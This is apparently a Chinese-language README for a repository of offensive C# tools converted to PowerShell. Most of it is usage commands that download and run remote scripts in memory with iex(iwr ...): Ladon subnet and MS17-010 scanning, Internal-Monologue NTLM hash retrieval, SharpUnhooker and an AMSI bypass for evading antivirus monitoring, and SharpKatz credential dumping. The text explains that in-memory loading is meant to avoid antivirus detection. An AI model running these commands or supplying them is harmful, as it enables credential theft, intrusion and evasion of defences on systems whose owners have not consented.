windows平台上许多攻击性武器都是由C#编写的,并且可以轻松地转为powershell脚本,我将这个仓库作为一个集合,用来储存OffensiveCsharp的powershell代码
之前使用Ladon的Powershell版本的时候似乎不能把扫描内容输出到txt文本中,因此我对它做了一点小小的修改。
使用Gzip-compress 和 base64-Encode 转换Ladon的二进制文件然后base64编码解码 并通过[System.Reflection.Assembly]::Load($DecompressedDecodedBinary)在powershell中加载Ladon的二进制文件
注意参数中需要加双引号
iex(iwr -UseBasicParsing https://raw.githubusercontent.com/INotGreen/Invoke-Ladon/main/Invoke-Ladon.ps1);
invoke-ladon "192.168.1.8/24 OnlinePC" > OnlinePC.txt
iex(iwr -UseBasicParsing https://raw.githubusercontent.com/INotGreen/Invoke-Ladon/main/Invoke-Ladon.ps1);
invoke-ladon "192.168.1.8/24 MS17010" > MS17010.txt
具体使用方法请参考:https://github.com/k8gege/Ladon
或者直接把调用命令放在脚本最后一行
Internalmonologue
Internalmonologue:在不接触 LSASS 的情况下检索 NTLM 哈希:https://github.com/eladshamir/Internal-Monologue
用法:
iex(iwr -UseBasicParsing https://raw.githubusercontent.com/INotGreen/Invoke-SharpOffensive/main/Invoke-Internalmonologue.ps1)
SharpUnhook用于规避AMSI的内存检测、ETW的监控同时hook了ring3的API,或许它仍然会被高级防病毒检测, 这只是一个例子,不要依赖它:https://github.com/GetRektBoy724/SharpUnhooker
用法: 远程加载
iex(iwr -UseBasicParsing https://raw.githubusercontent.com/INotGreen/Invoke-SharpOffensive/main/Invoke-SharpUnhook.ps1)
本地加载
Import-Module .\Invoke-SharpUnhook.ps1
DelegateAmzzBypass.ps1 bypass amsi脚本
iex(iwr -UseBasicParsing https://raw.githubusercontent.com/javelin266/Invoke-SharpOffensive/main/DelegateAmzzBypass.ps1)
#然后导入sharpkatz.ps1 试试效果
iex(iwr -UseBasicParsing https://raw.githubusercontent.com/javelin266/Invoke-SharpOffensive/main/Invoke-SharpKatz.ps1)
Invoke-SharpKatz
使用某些方法可以封装powershell的脚本,让powershell在内存中运行,以此规避一些防病毒软件的查杀,这样就防止从Ladon的源码进行免杀处理的操作,对于powershell的免杀,有时候还要考虑规避AMSI的问题。